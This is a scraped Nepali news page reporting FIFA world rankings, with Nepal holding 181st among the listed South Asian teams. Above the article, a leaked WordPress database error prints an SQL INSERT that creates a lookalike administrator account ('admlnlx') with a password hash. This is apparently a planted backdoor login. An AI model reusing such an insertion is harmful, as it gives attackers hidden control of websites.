WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3Jzp.xCsKst25Le22Am0vr3pfEYk.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:20:55', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ७-
विश्व फुटबलको नियमनकारी निकाय फिफाले जारी गरेको नयाँ वरियतामा नेपाल यथास्थानमा कायमै छ । तर, दक्षिण एसियाली देशहरुमा नेपालभन्दा पछाडि तीन देश छन् ।
फिफाले बिहीबार सार्वजनिक विश्व वरियतामा नेपाल १८१ औं स्थानमा कायमै छ । बंगलादेश, श्रीलंका र पाकिस्तान नेपालभन्दा पछाडि परेका छन् । बंगलादेश दु्ई स्थान तलझर्दै १८५ औं स्थानमा छ भने श्रीलंका १९५ औं र पाकिस्तान १९७ औं स्थानमा कायमै छन् ।
दक्षिण एसियाली देशहरुको शीर्ष स्थानमा भारत छ । दुई स्थान माथि उक्लिएको भारत १३५ औं स्थानमा छ भने एक स्थान माथि उक्लिएको अफगानिस्तान १४६ औं स्थानमा छ । माल्दिभ्स १५४ औं स्थानमा कायमै छ भने भुटान एक स्थान तल झरेर १७७ औं स्थानमा पुगेको छ ।
विश्व वरियताको शीर्ष स्थानमा अर्जेन्टिना कायमै छ । वरियताको २८ नम्बरसम्म कुनै परिर्वतन भएको छैन । ब्राजिल दोस्रो। जर्मनी तेस्रो, चिली चौथो र बेल्जियम पाँचौं स्थानमा छ ।फ्रान्स सातौं स्थानमा छ । फिफा वरियतामा उसको यो अहिलेसम्मकै राम्रो अवस्था हो ।